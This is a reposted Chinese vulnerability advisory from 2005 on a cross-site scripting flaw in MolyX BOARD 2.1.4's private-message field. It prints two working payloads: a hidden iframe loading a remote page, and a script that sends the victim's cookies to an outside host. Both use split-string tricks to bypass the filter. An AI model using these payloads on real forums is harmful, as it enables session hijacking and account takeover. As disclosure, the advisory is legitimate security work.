魔力论坛2.1.4CSS/XSS跨站脚本安全漏洞

来源:岁月联盟 编辑:zhuzhu 时间:2005-10-20
魔力论坛2.1.4CSS/XSS跨站脚本安全漏洞 漏洞发现:ReJeCt{B.C.T}
组织名称:[Bug.Center.Team-漏洞预警中心小组]
厂商名字:MolyX BOARD(魔力论坛
厂商地址:http://www.MolyX.com
漏洞程序:MolyX BOARD 2.1.4
漏洞类型:CSS/XSS 跨站
影响版本:MolyX BOARD 2.1.4(之前版本未测试.应该也存在)
程序介绍:
魔力论坛(MolyX Board)由魔力工作室(MolyX Studios)经过数年的市场技术调研及学习研究,
在融合了当今众多论坛程序技术和实践优点的基础上,针对中国人的使用习惯开发研制的一
款功能强大、速度飞快、性能卓越、安全性极高的论坛系统。其采用PHP 及MySql 构建,
整体架构采用最先进的面向对象思想,在功能、速度、性能、安全及开发理念和创新意识上
均超越了目前国内外市场同类产品。魔力论坛推出的短短数月间,就获得了大量用户和业界
专家的一致好评和认可,越来越多的用户选择了魔力论坛作为应用网站论坛社区的解决方
案。
漏洞资料:
目前所涉及版本的论坛短信内容处没有做好细致的过滤,导致跨站脚本漏洞安全的产生,使得
用户可以得到管理员的COOKIE 信息.从而进一步危害论坛.
漏洞利用:
在撰写短消息处正文内容上填上如下利用代码:
一,网页安全:

<script>document.write(’<iframe src="ht’+’tp://www.r3j3ct.net/cnbct.htm" width="0"
height="0"></iframe>’)</script>

上述代码是一个iframe 代码.ht’+’tp://www.r3j3ct.net/cnbct.htm 作为网页安全之用,因论坛程序
短信息处对http 已作处理.故使用ht’+’tp 绕过限制触发漏洞效果.
二,偷取cookie:

<script>window.location=’ht’+’tp://www.r3j3ct.net/cookie.asp?msg=’+document.cookie</script>

上述为偷取cookie 代码.当用户访问短信息时就会自动获取cookie.从而保存txt 文件里.恶意
用户就会利用偷取到的Cookie 进行登录,修改受害人信息以及进一步安全之用.
官方补丁:
MolyX BOARD
http://www.molyx.com